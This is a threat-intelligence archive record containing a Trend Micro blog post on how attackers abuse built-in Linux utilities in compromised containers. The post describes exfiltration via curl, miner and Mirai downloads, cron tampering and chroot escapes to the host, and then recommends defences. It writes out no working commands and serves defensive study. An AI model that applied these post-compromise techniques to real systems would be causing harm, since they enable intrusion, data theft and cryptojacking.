{ "id": "4b778185-e6fb-4c14-a2b8-08d4575dbdf5", "created_at": "2026-04-06T00:22:17.303142Z", "updated_at": "2026-04-12T02:21:29.09163Z", "deleted_at": null, "sha1_hash": "b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343", "title": "How Malicious Actors Abuse Native Linux Tools in Their Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1455984, "plain_text": "How Malicious Actors Abuse Native Linux Tools in Their Attacks\r\nBy Nitesh Surana, David Fiser, Alfredo Oliveira ( words)\r\nPublished: 2022-09-08 · Archived: 2026-04-05 23:06:59 UTC\r\nCloud\r\nThrough our honeypots and telemetry, we were able to observe instances in which malicious actors abused native\r\nLinux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used\r\nand provide recommendations on how to minimize their impact.\r\nBy: Nitesh Surana, David Fiser, Alfredo Oliveira Sep 08, 2022 Read time: 7 min (1973 words)\r\nSave to Folio\r\nIntroduction\r\nContainer adoption has become mainstream, with usage having risen across organizations globally. Based on a\r\nsurvey from CNCF, 93% of respondents are currently using or planning to use containers in their production.\r\nContainer orchestration projects like Kubernetes and other tools available in the cloud and across the internet has\r\nled to a wave of transformations in how organizations operate, from monolithic architectures to the creation of\r\ndistributed systems consisting of microservices.\r\nHowever, these changes have also resulted in the expansion of the attack surface, particularly through security\r\nmisconfigurations or vulnerabilities introduced in the deployments. Cloud securitynews article is further\r\ncomplicated by the fact that patch management can often be an enormous undertaking for organizations, which\r\nmeans that updates are not always implemented in a timely manner.  \r\nWhen it comes to public-facing web applications, we have been observing critical vulnerabilities arising from a\r\nwide range of sources, ranging from vulnerable open-source libraries (Log4Shell and Spring4Shell) to\r\nframeworks (Apache Struts and Drupal), and even applications such as Atlassian Confluence, Oracle WebLogic\r\nServer, and Apache HTTP Server. Once proof-of-concepts (POCs) for vulnerabilities are disclosed, attackers can\r\nexploit them to perform malicious tasks from mining cryptocurrency to, at times, deploying ransomwarenews-cybercrime-and-digital-threats.\r\nFrom the perspective of a defender, the ideal outcome would be to prevent the attacker from even gaining an\r\ninitial foothold. However, this isn’t what always the case. If an attacker does manage to enter the system, it is the\r\ndefender’s job to make it more difficult for attackers to successfully pull off their routines by using defense-in-depth strategies.\r\nThrough our network of honeypots and verbose telemetry, we were able to observe some interesting\r\ncharacteristics for most of the successful exploit attempts, particularly, how attackers use native Linux tools in\r\ntheir routines.\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 1 of 14\n\nExamining attacks using legitimate utilities and tools on Linux environments\r\nAn attack on a Linux-based system typically follows a standard exploitation chain. First, an attacker exploits a\r\nvulnerability (or a chain of vulnerabilities) to gain initial access into the environment (which we can now consider\r\nas compromised). From there, an attacker may take different paths to move further inside the compromised\r\nenvironment:\r\n1. Enumerating the context of the current environment (Discovery)\r\n2. Exfiltrating sensitive data from the environment (Exfiltration, Impact)\r\n3. Performing a denial-of-service attack by removing the application (Impact)\r\n4. Mining cryptocurrency by downloading miners (Impact)\r\n5. Attempting other techniques  (Privilege Escalation, Lateral Movement, Persistence, or Credential Access)\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 2 of 14\n\nFigure 1. How an attacker can pivot further within a compromised environment\r\nBased on real-world attacks and our honeypots, we observed that malicious actors use a variety of enabled tools\r\nthat come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and\r\npkill, that are abused by attackers for nefarious purposes.\r\nWe have seen malicious actors abusing these tools in the wild. The presence of these utilities, especially inside\r\ncontainer environments, should be at least considered, since they provide additional avenues for attackers.\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 3 of 14\n\nLet’s examine some real-world attacks and instances of abuse that we observed via Trend Micro Cloud One™ and\r\nVision One.\r\nFigure 2. Using base64 to decode the payload for later execution\r\nThe base64 tool is a Linux utility that decodes strings encoded in base64 format. Attackers often obfuscate their\r\npayloads and commands using base64 encoding to evade detection (T1027), a technique we describe in detail in\r\nour previous article The Evolution of Malicious Shell Scripts.\r\nFigure 3. Using the “cat” process to view the .bash_history for all users\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 4 of 14\n\nThe .bash history file, which is stored in the user’s home directory, logs the commands executed by users on their\r\nbash shell. Attackers have been known to extract information from these files to understand the context of the\r\ncurrent environment, as we previously detailed in another article —  Misconfigured Docker Daemon API Ports\r\nAttacked for Kinsing Malware Campaignnews article.\r\nFigure 4. Using the “cat” process to view '/etc/passwd'\r\nAs a part of the enumeration step, the attacker accesses the /etc/passwd file, which contains a list of the registered\r\nusers within the environment and shows whether a given user has an associated shell with their login. This\r\ninformation helps the attacker understand the environment and pinpoint users of value. (T1003.008)\r\nFigure 5. Using “chattr”` to modify the /etc/crontab file to be mutable\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 5 of 14\n\nThe chattr utility is used to alter file and folder attributes to control sudden operations like the deletion and\r\nmodification of files. The example in Figure 4 shows that the attributes of the /etc/crontab file has been altered,\r\nmaking the file unsecure. This utility has previously been observed to be abused by TeamTNT, as discussed in our\r\nwhite paper, Tracking the Activities of TeamTNT.\r\nFigure 6. Using “chmod” to make a file executable\r\nThe chmod tool is used to change the file mode and granularize access per user or group. It’s required to execute\r\nnewly downloaded executables, and, in this case, we see the agettyd file at the path /tmp being set with the\r\nexecutable bit.\r\nFigure 7. Using “crontab” to remove all existing cron jobs\r\nA cron job is a utility used to schedule tasks (or jobs). Attackers have been known to abuse cron jobs and modify\r\nthe ‘crontab’ to perform execution, persistence, and, at times, privilege escalation techniques (T1053.003). The\r\nexample in Figure 7 shows the removal of existing cron jobs. This is a common occurrence where cryptocurrency\r\nminers compete against each other by removing traces of other miners to hijack the maximum amount of\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 6 of 14\n\nresources possible. Our blog entry, War of Linux Cryptocurrency Miners: A Battle for Resources, discusses these\r\nactivities in-depth.\r\nFigure 8. Using “curl” to exfiltrate system information to the attacker\r\nThe curl, or cURL, utility is used to transfer data across different protocols, such as HTTP, HTTPS, and File\r\nTransfer Protocol (FTP). The example in Figure 8 shows that system information such as the OS version and\r\nrelease version is sent as a POST request to the attacker’s infrastructure.\r\nFigure 9. Using “curl” to download xmrig binaries from GitHub\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 7 of 14\n\nFigure 10. Using “pkill” to kill competing processes/coinminers\r\nThe kill suite utility is used to send signals to processes and, as illustrated in the example in Figure 10, it sends the\r\nSIGKILL signal to the process named “kdevtmpfsi”. We have been observing cryptocurrency miners named\r\nkdevtmpfsi as early as 2020. Our blog entry, Analysis of Kinsing Malware's Use of Rootkit, shows another\r\nexample of a competing miner being terminated.\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 8 of 14\n\nFigure 11. Using “ps” to view running processes\r\nThe ps utility is used to view the status of a process. Figure 11 shows the ps aux command fetching verbose\r\ninformation about the processes, such as currently running processes, process IDs, and process privileges, on the\r\nsystem. This information can aid attackers in performing discovery-related techniques (T1057 – Process\r\nDiscovery) and gaining information about the environment they’re in.\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 9 of 14\n\nFigure 12. Using “rm” to remove hidden files from /tmp directory\r\nIn Figure 11, we see the rm tool being used to delete the hidden files and folders under the /tmp directory.\r\nAttackers can create hidden directories to evade detection by adding “.” before the file or folder name (Hide\r\nArtifacts: Hidden Files and Directories - T1564.001).\r\nFigure 13. Using “ssh” to infect underlying host with XMR miners\r\nThe ssh utility is the remote client used for accessing systems over Secure Shell (SSH) in a worm-like fashion. In\r\nFigure 13, the attacker tries to download the Monero miner (using wget/curl) and infect the remote machine in\r\nwhich the SSH is being attempted (127.0.0.1). Once attackers mount the underlying host’s file system due to\r\nunsecure configuration (for example, privileged containers) of containers, they create new pairs of SSH keys, use\r\nit to establish an “ssh” session, and infect the underlying host with cryptocurrency miners.\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 10 of 14\n\nFigure 14. Using “wget”, “curl”, “chmod” to download and execute Mirai malware\r\nIn this example, we see the combined use of different Linux utilities wherein the binary is downloaded,\r\npermissions are modified, and then later executed. The executable named “runnable” is a Mirai sample delivered\r\nafter the exploitation of the Log4shell vulnerability tracked under CVE-2021-44228.\r\nFigure 15. Using “whoami” to view current user context\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 11 of 14\n\nFigure 16. Workbench showing an attacker using “chroot” and “base64”\r\nUsing the Vision One workbench, we see the chroot and base64 utilities being used by an attacker. Note that\r\nchroot is used to change the root to the directory supplied (in this case, /host), where the underlying host’s file\r\nsystem is mounted within the container. We explore the weakness posed by this function when granted to a\r\ncontainer in our article,  Why A Privileged Container in Docker is a Bad Idea.\r\nBest practices for protecting Linux systems from utility abuse\r\nBy observing the techniques discussed in the previous section, we see that the attackers can use a set of tools that\r\ncome bundled with a full-scale operating system. As defenders, it would be safer to have container images that\r\ncontain only the tools we require, and remove the tools that aren’t needed.\r\nThis approach to security can help mitigate risk to a great extent, even against critical vulnerabilities such as\r\nLog4Shell. Reducing the number of tools needed for applications to run also reduces the attack surface introduced\r\nby the dependency vulnerabilities in open-source libraries and tools. Here enters the concept of distroless images,\r\nwhich are described as images that contain only the application and its runtime dependencies, doing away with the\r\nprograms you would expect to find in a typical Linux distribution such as package managers and shells.\r\nFrom a defender's perspective, the focus should be on disabling, or rather, disarming the attacker via defense-in-depth strategies. While making changes to the system to minimize or even prevent abuse would help, a\r\nmultilayered approach that leverages multiple security measures would provide the strongest level of security,\r\nideally by combining best practices with effective defense technologies.\r\nFor non-containerized environments, Cloud One Workload Security provides the Application Control module,\r\nwhich monitors software changes and allows or blocks them based on the set configuration. It creates a baseline of\r\nthe existing applications and applies the rules to the new applications that are downloaded and installed. It works\r\nbased on the SHA256 hash for a binary.\r\nIt provides options for users to do the following:\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 12 of 14\n\n1. Block unrecognized software until explicitly allowed\r\n2. Allow unrecognized software until explicitly blocked\r\nWe download a pre-compiled binary of the nmap network enumeration tool from GitHub using wget on an\r\nUbuntu 20.04 long-term support (LTS ) server. The server was then configured with the Cloud One Workload\r\nSecurity agent running with the Application Control module set to ‘Block’ mode for unrecognized software. As\r\nshown in the Figure 17, the execution was prevented by Application Control.\r\nFigure 17. Prevention the execution of the “nmap” binary using the Application Control module\r\nfrom Cloud One Workload Security\r\nFigure 18. The corresponding event on Cloud One Workload Security, where we see that the\r\n“nmap” binary was blocked from being executed\r\nConclusion\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 13 of 14\n\nWith attackers making use of legitimate tools and utilities that are built into the operating system, defenders will\r\nneed to prioritize how they can set up controls during the different phases of an attack. Minimizing the attack\r\nsurface by using distroless images in containers and applying preventive controls like Cloud One Workload\r\nSecurity’s Application Control go a long way in slowing down attackers targeting cloud environments. In cases\r\nwhere organizations cannot go with a distroless implementation, “slimmed-down” versions of the same images\r\ncan also be used to reduce the attack surface and strengthen the security of cloud deployments. \r\nTags\r\nSource: https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html" ], "report_names": [ "how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-12T02:00:04.986191Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "f809bfcb-b200-4988-80a8-be78ef6a52ef", "created_at": "2023-01-06T13:46:39.186988Z", "updated_at": "2026-04-12T02:00:03.31996Z", "deleted_at": null, "main_name": "TeamTNT", "aliases": [ "Adept Libra" ], "source_name": "MISPGALAXY:TeamTNT", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4", "created_at": "2022-10-25T15:50:23.334495Z", "updated_at": "2026-04-12T02:00:04.375091Z", "deleted_at": null, "main_name": "TeamTNT", "aliases": [ "TeamTNT" ], "source_name": "MITRE:TeamTNT", "tools": [ "Peirates", "MimiPenguin", "LaZagne", "Hildegard" ], "source_id": "MITRE", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-12T02:00:03.381815Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434937, "ts_updated_at": 1775960489, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343.pdf", "text": "https://archive.orkl.eu/b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343.txt", "img": "https://archive.orkl.eu/b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343.jpg" } }